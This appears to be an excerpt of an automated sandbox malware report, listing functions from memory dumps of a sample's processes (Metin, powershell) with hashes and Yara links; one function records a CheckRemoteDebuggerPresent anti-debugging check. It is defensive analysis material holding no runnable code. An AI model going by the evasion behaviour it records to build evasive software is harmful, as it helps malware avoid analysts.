                                                                                                                    • Opcode ID: 101a495c7c9f5e5462ac9a456093ffa3e034463157cf68d1a86d3dc810265eea
                                                                                                                    • Instruction ID: 34514e4f7839a2b3890aab4e6eb37882ec64644d2ce8249a2cdcdb001fc2aa98
                                                                                                                    • Opcode Fuzzy Hash: 101a495c7c9f5e5462ac9a456093ffa3e034463157cf68d1a86d3dc810265eea
                                                                                                                    • Instruction Fuzzy Hash: 9A41B43190C6588FD719DFA8D849BE9BBF0FF56311F14416EE08AC3692CB746846CB91
                                                                                                                    Function 00007FF7C14179B1 Relevance: 1.6, APIs: 1, Instructions: 128COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 343 7ff7c14179b1-7ff7c1417a6d CheckRemoteDebuggerPresent 347 7ff7c1417a6f 343->347 348 7ff7c1417a75-7ff7c1417ab8 343->348 347->348
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.2565009591.00007FF7C1410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1410000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_7ff7c1410000_Metin.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CheckDebuggerPresentRemote
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3662101638-0
                                                                                                                    • Opcode ID: d09367793306c2542ab27db6d89eaac2063b2be9b2bc158320470e679d492540
                                                                                                                    • Instruction ID: 22baa52824d1b3aa76bf2d1d0c4e836667f57831ef50356e24a71d260236cf3c
                                                                                                                    • Opcode Fuzzy Hash: d09367793306c2542ab27db6d89eaac2063b2be9b2bc158320470e679d492540
                                                                                                                    • Instruction Fuzzy Hash: B931227190875C8FCB58DF58C84A7E97BE0FF69321F05426BD48AD7292DB34A842CB91

                                                                                                                    Executed Functions

                                                                                                                    Function 00007FF7C143947D Relevance: .5, Instructions: 461COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.1474148632.00007FF7C1430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1430000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_7ff7c1430000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 0849a3a94a9518fe372ee5fa8049f9f2abcd08e153998d8e6d7eb806cadf7206
                                                                                                                    • Instruction ID: 3a1dbd0c36d5fb651075ccf3ba8a360956bcd9ccee3656ca107a26f4eaddbd3d
                                                                                                                    • Opcode Fuzzy Hash: 0849a3a94a9518fe372ee5fa8049f9f2abcd08e153998d8e6d7eb806cadf7206
                                                                                                                    • Instruction Fuzzy Hash: F4E1FA63D0DAC54FE316AE2CAC591F9BF90EF52774B8802FBC088871D3ED55690587A2
                                                                                                                    Function 00007FF7C150660A Relevance: .4, Instructions: 436COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.1475216339.00007FF7C1500000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1500000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_7ff7c1500000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 335f0092d5bf9b7d6e4076709e202d088d1ca447ad39139b73fb6ce8784d6237
                                                                                                                    • Instruction ID: a0792840edbab5af3cdf0e22f11d1f5a89140c848b0f08803d8502fc08717a97
                                                                                                                    • Opcode Fuzzy Hash: 335f0092d5bf9b7d6e4076709e202d088d1ca447ad39139b73fb6ce8784d6237
                                                                                                                    • Instruction Fuzzy Hash: A7D17872A0DAC94FEB55AF6868155B9FBE1FF05360B4801FED04DC71E3EA58A806C361
                                                                                                                    Function 00007FF7C1439F52 Relevance: .2, Instructions: 189COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.1474148632.00007FF7C1430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1430000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_7ff7c1430000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 656ca428c41b2545b7490cf711b859156e32a63614afca09c4b59a97334a88e5
                                                                                                                    • Instruction ID: 68d940e943154d341e57c2d204fe218b335188251fc4fc5b4a384b7d54a85cef
                                                                                                                    • Opcode Fuzzy Hash: 656ca428c41b2545b7490cf711b859156e32a63614afca09c4b59a97334a88e5
                                                                                                                    • Instruction Fuzzy Hash: 3F514EB3A496894FD7027F2CACA61D9BBA0DF1337978802F3C4948B2E3FD5525168791
                                                                                                                    Function 00007FF7C1504073 Relevance: .2, Instructions: 186COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.1475216339.00007FF7C1500000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1500000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_7ff7c1500000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 15d8fe82e0a224dd0329fa8394320fa6a2317521305b0d16eaaf11075e82e6cf
                                                                                                                    • Instruction ID: 0f5f3fd33db7f75bf272431c30a91f2e03868f4191144173a09be90318a1f6f8
                                                                                                                    • Opcode Fuzzy Hash: 15d8fe82e0a224dd0329fa8394320fa6a2317521305b0d16eaaf11075e82e6cf
                                                                                                                    • Instruction Fuzzy Hash: F851D632F0CA464FE799EE5C64515B5B7D2EF95721B9801BAC00EC76A2EE14EC058391
                                                                                                                    Function 00007FF7C1504370 Relevance: .1, Instructions: 148COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.1475216339.00007FF7C1500000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1500000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_7ff7c1500000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: aea60c585736a281cd0679b249a0a5f0291c9f6b78e2b3b8ab3d6a238bd3da77
                                                                                                                    • Instruction ID: e5c5ddbb71889ff7c3bdc9f29ac17dee7f4baa67ebf41512abbc9a9025626114
                                                                                                                    • Opcode Fuzzy Hash: aea60c585736a281cd0679b249a0a5f0291c9f6b78e2b3b8ab3d6a238bd3da77
                                                                                                                    • Instruction Fuzzy Hash: 39412732E0CA494FE7A5EB6C74546F8B7E1EF44730B8901BAC04EC71A3EA54AC418391
                                                                                                                    Function 00007FF7C1439738 Relevance: .1, Instructions: 143COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.1474148632.00007FF7C1430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1430000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_7ff7c1430000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 0e629a20761e94c49806664ad72e9123b1ebf89dcbd9b9b4a8b44407ea71c3ee
                                                                                                                    • Instruction ID: b002dff578def3223ac7f93c25e197f92be235dd43fbe0f3c2f65fe0bdd9078d
                                                                                                                    • Opcode Fuzzy Hash: 0e629a20761e94c49806664ad72e9123b1ebf89dcbd9b9b4a8b44407ea71c3ee
                                                                                                                    • Instruction Fuzzy Hash: A5412A31D1CA489FDB49AF5C98066B9BBE0FB95710F54413FD04983292DB74A91687C2
                                                                                                                    Function 00007FF7C131E380 Relevance: .1, Instructions: 124COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.1473343658.00007FF7C131D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C131D000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_7ff7c131d000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: b277631c56f1b588d534d3cb701c2dc99567e68c8c77cad5d8822360bbc9765f
                                                                                                                    • Instruction ID: b1bcd526c829def18dca1bcea42be7fcbbfb447910ff34307d90aa03bc545bd0
                                                                                                                    • Opcode Fuzzy Hash: b277631c56f1b588d534d3cb701c2dc99567e68c8c77cad5d8822360bbc9765f
                                                                                                                    • Instruction Fuzzy Hash: D041257080DBC44FD75A9F3898459527FF0EF42324B1606FFD088CB1A3D625A846C7A2
                                                                                                                    Function 00007FF7C15040BF Relevance: .1, Instructions: 99COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.1475216339.00007FF7C1500000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1500000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_7ff7c1500000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 7d1af17a56f06e06cff2253c976dabe721c667889558baff41e97fe59de306d7
                                                                                                                    • Instruction ID: 62fd476aaa41cd25f79db57588d5c6c10f641a7bcb75c7986675c89274e76635
                                                                                                                    • Opcode Fuzzy Hash: 7d1af17a56f06e06cff2253c976dabe721c667889558baff41e97fe59de306d7
                                                                                                                    • Instruction Fuzzy Hash: 2821C332E0DA874FE7A5EF596455174A7D2EF54321BC901BAC00EC76E2EE68EC048251
                                                                                                                    Function 00007FF7C143A47C Relevance: .1, Instructions: 99COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.1474148632.00007FF7C1430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1430000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_7ff7c1430000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 8ee73f56e72c7335ee34ca1431f79e01a334083b7659922f2b014998305e15ee
                                                                                                                    • Instruction ID: 2a1c1b006bae9a4f0bdf92beb1b46f5067fd98436fee3081dafdc575d1dbc90d
                                                                                                                    • Opcode Fuzzy Hash: 8ee73f56e72c7335ee34ca1431f79e01a334083b7659922f2b014998305e15ee
                                                                                                                    • Instruction Fuzzy Hash: AF21F53090CB488FDB59DFA8984A7E97BE0EB96321F04416BD448C3292DA74A416CB92
                                                                                                                    Function 00007FF7C15043BC Relevance: .1, Instructions: 63COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.1475216339.00007FF7C1500000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1500000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_7ff7c1500000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: b3367c6bdb8c2856936302bbb07ccc77dffd064172af2431825368871cc81017
                                                                                                                    • Instruction ID: cedae3f22b0751942ebf80c79b94f59c1367aec403bdf8a6682cf7bc8b6d9eef
                                                                                                                    • Opcode Fuzzy Hash: b3367c6bdb8c2856936302bbb07ccc77dffd064172af2431825368871cc81017
                                                                                                                    • Instruction Fuzzy Hash: FF110232D0D9854FE7A4EF68A4945B8F7D1FF4433178900BAD01DC75A3EA68AC508361
                                                                                                                    Function 00007FF7C14333B5 Relevance: .0, Instructions: 49COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.1474148632.00007FF7C1430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1430000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_7ff7c1430000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                                                    • Instruction ID: 3c51e4c4f3955faf83e41b9041cfc47b18711a59c176f735775c2e75df53298d
                                                                                                                    • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                                                    • Instruction Fuzzy Hash: 9701677111CB0C4FD744EF0CE451AA5B7E0FB95364F50056EE58AC3661DA36E892CB45

                                                                                                                    Non-executed Functions

                                                                                                                    Function 00007FF7C1438BFA Relevance: 5.1, Strings: 4, Instructions: 85COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.1474148632.00007FF7C1430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1430000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_7ff7c1430000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: M_^4$M_^7$M_^F$M_^J
                                                                                                                    • API String ID: 0-622050427
                                                                                                                    • Opcode ID: 0952385b8bdb8dc4856a798c81327935ad6e11df2551058c8feb274a0171bac6
                                                                                                                    • Instruction ID: 56373cce23d21821fe10310d74909abda03854b99e2d3451b8a64c595405a0b6
                                                                                                                    • Opcode Fuzzy Hash: 0952385b8bdb8dc4856a798c81327935ad6e11df2551058c8feb274a0171bac6
                                                                                                                    • Instruction Fuzzy Hash: 4421C5B77085659ED3027B7DAC087D97780CF9A2B578507B2E1A9CB293F91470868AD0

                                                                                                                    Executed Functions

                                                                                                                    Function 00007FF7C133EB80 Relevance: 1.4, Strings: 1, Instructions: 124COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000011.00000002.1614019174.00007FF7C133D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C133D000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_17_2_7ff7c133d000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 4
                                                                                                                    • API String ID: 0-4088798008
                                                                                                                    • Opcode ID: cca7d357c2a5530a8d40701653847b51ddb49fb81a97dcb9520f22e4de43cd47
                                                                                                                    • Instruction ID: 1cae43fabc6b7ef87b7b3dc8cccdbc5a8e3196ae86a65b2791136fa0d0729a32
                                                                                                                    • Opcode Fuzzy Hash: cca7d357c2a5530a8d40701653847b51ddb49fb81a97dcb9520f22e4de43cd47
                                                                                                                    • Instruction Fuzzy Hash: E041397080DBC48FD75A9F3898559527FF0EF52324B1506FFD089CB1A3D625A846C7A2
                                                                                                                    Function 00007FF7C152660A Relevance: .4, Instructions: 447COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000011.00000002.1615703726.00007FF7C1520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1520000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_17_2_7ff7c1520000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 4440a845998215a44fa0366f7a2b5239dde3ae8b221663688ddfb5c20c06e837
                                                                                                                    • Instruction ID: a3855e958bb2c05ed335913927815697b22ddc340f12bde6754c3760187060e4
                                                                                                                    • Opcode Fuzzy Hash: 4440a845998215a44fa0366f7a2b5239dde3ae8b221663688ddfb5c20c06e837
                                                                                                                    • Instruction Fuzzy Hash: D2D15872A0DA894FEB55EB2868555B9FBE1EF05320B4801FED84DC71E3DA54AC06C361
                                                                                                                    Function 00007FF7C1459D48 Relevance: .2, Instructions: 219COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000011.00000002.1614864056.00007FF7C1450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1450000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_17_2_7ff7c1450000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 017f8632264296be737501b99a736d8ba119a0b345ade0dae4da746c39fe4c0d
                                                                                                                    • Instruction ID: 149692fb3c0ef4f0177264515aefa1303d3f7738e094b1f9e1cb3acc27316d66
                                                                                                                    • Opcode Fuzzy Hash: 017f8632264296be737501b99a736d8ba119a0b345ade0dae4da746c39fe4c0d
                                                                                                                    • Instruction Fuzzy Hash: 51F0A77580CA8C8FCB45EF2C98295E8BFF0FF65245B5401EBE84DC7161EA659918C7C1
                                                                                                                    Function 00007FF7C1459740 Relevance: .2, Instructions: 185COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000011.00000002.1614864056.00007FF7C1450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1450000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_17_2_7ff7c1450000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 38601aac32b0b5856ceaee2d879e93f944e61470b72a9552a9fd04eb5749b77c
                                                                                                                    • Instruction ID: e681d98edaab3f59d9eb5c91b04daa581edfb9c718d58bd7ab83643fc9fcc904
                                                                                                                    • Opcode Fuzzy Hash: 38601aac32b0b5856ceaee2d879e93f944e61470b72a9552a9fd04eb5749b77c
                                                                                                                    • Instruction Fuzzy Hash: E5510671D0CF889FE7199E1CAC152B8BBE0FB56720F54427FD48983193CA64A90AC7D6
                                                                                                                    Function 00007FF7C145BDD0 Relevance: .2, Instructions: 171COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000011.00000002.1614864056.00007FF7C1450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1450000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_17_2_7ff7c1450000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: eeafc36106228ba360cfb1071ab77b058c4e641d74365670229ae58c64081b79
                                                                                                                    • Instruction ID: 714b5b2ade54c156af2574e25c72b6b8abfbc561181e1d5e5e40579b1c8216b7
                                                                                                                    • Opcode Fuzzy Hash: eeafc36106228ba360cfb1071ab77b058c4e641d74365670229ae58c64081b79
                                                                                                                    • Instruction Fuzzy Hash: 1C31083190CA884FDB19DF6C9C497B97BF0EB96320F0441BFD449C7197C664A80AC792
                                                                                                                    Function 00007FF7C14533B5 Relevance: .0, Instructions: 49COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000011.00000002.1614864056.00007FF7C1450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1450000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_17_2_7ff7c1450000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                                                                    • Instruction ID: 6658d0e6fbc243bc48614a63e7b3be1e782d70a082428a99f0505a8330d5213c
                                                                                                                    • Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                                                                    • Instruction Fuzzy Hash: 6101677111CB0C4FD744EF0CE451AA5B7E0FB95364F50056EE58AC3661DA36E892CB45
                                                                                                                    Function 00007FF7C152414D Relevance: .0, Instructions: 37COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000011.00000002.1615703726.00007FF7C1520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1520000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_17_2_7ff7c1520000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 3e28a1733e4c34d9c4f742a2e8df8a3cb384f72f5c40262bf95f2cb21ba2037b
                                                                                                                    • Instruction ID: 2a3e15cd051c2371b1f853666172ad62cfa2f5a0954ada352a97c91b2688f70b
                                                                                                                    • Opcode Fuzzy Hash: 3e28a1733e4c34d9c4f742a2e8df8a3cb384f72f5c40262bf95f2cb21ba2037b
                                                                                                                    • Instruction Fuzzy Hash: 06F0BE32A0C9448FE758EB0CF4014A8B7E0EF54330B6100FAE05DC75A3CA25EC808790
                                                                                                                    Function 00007FF7C1524400 Relevance: .0, Instructions: 35COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000011.00000002.1615703726.00007FF7C1520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1520000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_17_2_7ff7c1520000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 74697078b45bac38a4573f4d4dd39c800e2d5f598db827e0637745670338641f
                                                                                                                    • Instruction ID: 0b93bb384fcba96947171df33e1e53c316008ef6888f85ca498b2a7304109deb
                                                                                                                    • Opcode Fuzzy Hash: 74697078b45bac38a4573f4d4dd39c800e2d5f598db827e0637745670338641f
                                                                                                                    • Instruction Fuzzy Hash: E6F05872A0C5448FD758EB1CF4418A8BBE0FF45320B9500F6E159CB5A3DA26AC8487A0
                                                                                                                    Function 00007FF7C15241D1 Relevance: .0, Instructions: 29COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000011.00000002.1615703726.00007FF7C1520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1520000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_17_2_7ff7c1520000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                                                                    • Instruction ID: 4b4c737a51420f7df1e598dfa80bad9af48b11eff2749f9d10292fb31ffb703d
                                                                                                                    • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                                                                    • Instruction Fuzzy Hash: C5E01A32B0C8088FEB68EE0CF0409A9B3E1EB9833176101B7D14EC7571CA22EC518B90
                                                                                                                    Function 00007FF7C145A2CA Relevance: .0, Instructions: 26COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000011.00000002.1614864056.00007FF7C1450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1450000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_17_2_7ff7c1450000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 8990b3f40b955f70b4a64106daba6e86a401b4685cde4945891be8a72f8af876
                                                                                                                    • Instruction ID: fd2b15441c66d41a74676566b5d6ba2e230f137c01cd91490e377aa8929d7154
                                                                                                                    • Opcode Fuzzy Hash: 8990b3f40b955f70b4a64106daba6e86a401b4685cde4945891be8a72f8af876
                                                                                                                    • Instruction Fuzzy Hash: 59E04F71414A4C8F8B49EF18D8198E67BA4FB69205B01028BE80DC7160DB319A58CBC2

                                                                                                                    Non-executed Functions

                                                                                                                    Function 00007FF7C1458BD3 Relevance: 7.6, Strings: 6, Instructions: 146COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000011.00000002.1614864056.00007FF7C1450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1450000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_17_2_7ff7c1450000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: K_^4$K_^5$K_^@$K_^N$K_^U$K_^Y
                                                                                                                    • API String ID: 0-4293504607
                                                                                                                    • Opcode ID: f33f4ed3bafa9d35f78779023424f810a0cec04a60b08397cbc16bf951b10ccd
                                                                                                                    • Instruction ID: 45a1a1e92a76c5161ee402a92e72b6c0f7ce239a7bfa4f1e103e230ec5cccb4f
                                                                                                                    • Opcode Fuzzy Hash: f33f4ed3bafa9d35f78779023424f810a0cec04a60b08397cbc16bf951b10ccd
                                                                                                                    • Instruction Fuzzy Hash: 333119B770892A1F97017A7DB8853E8A794DF9A37A38547B7D198CF293CC14708B86D0
                                                                                                                    Function 00007FF7C14589F2 Relevance: 6.4, Strings: 5, Instructions: 102COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000011.00000002.1614864056.00007FF7C1450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1450000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_17_2_7ff7c1450000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: K_^$K_^$K_^$K_^$K_^
                                                                                                                    • API String ID: 0-4077390204
                                                                                                                    • Opcode ID: 91c9df451abfc87460efb3dbada4430ea8fab0be51ab54600a4a4ce2a2951e5f
                                                                                                                    • Instruction ID: 40a128c6b4678284a258a68cd38ebc3ea988065c72d38e36f06384dbb41bc070
                                                                                                                    • Opcode Fuzzy Hash: 91c9df451abfc87460efb3dbada4430ea8fab0be51ab54600a4a4ce2a2951e5f
                                                                                                                    • Instruction Fuzzy Hash: C231C8F3A0D9C32FE34A5A291CB60D5AF94EF5332830901F6D595CA8E3ED146A174351

                                                                                                                    Executed Functions

                                                                                                                    Function 00007FF7C151660A Relevance: .4, Instructions: 435COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000013.00000002.1794067032.00007FF7C1510000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1510000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_19_2_7ff7c1510000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: d2d1534c799be8af202cab6fc266bcf6120ed8ac70831586c6d27ca8c71364ae
                                                                                                                    • Instruction ID: 8b84764a0f5d89d79823f2ddaf5a1eb8bdff39f12331886909579ce117bce779
                                                                                                                    • Opcode Fuzzy Hash: d2d1534c799be8af202cab6fc266bcf6120ed8ac70831586c6d27ca8c71364ae
                                                                                                                    • Instruction Fuzzy Hash: B5D19831A0DA895FE756AF2858145B9FBE1FF05360B5901FED40DC71E3EA98AC06C361
                                                                                                                    Function 00007FF7C1514073 Relevance: .2, Instructions: 185COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000013.00000002.1794067032.00007FF7C1510000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1510000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_19_2_7ff7c1510000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: a88a81f58cbc33c3b7f411ace3cbe5e1ae5b0bdbf3c2b7d083a85f37b33b567c
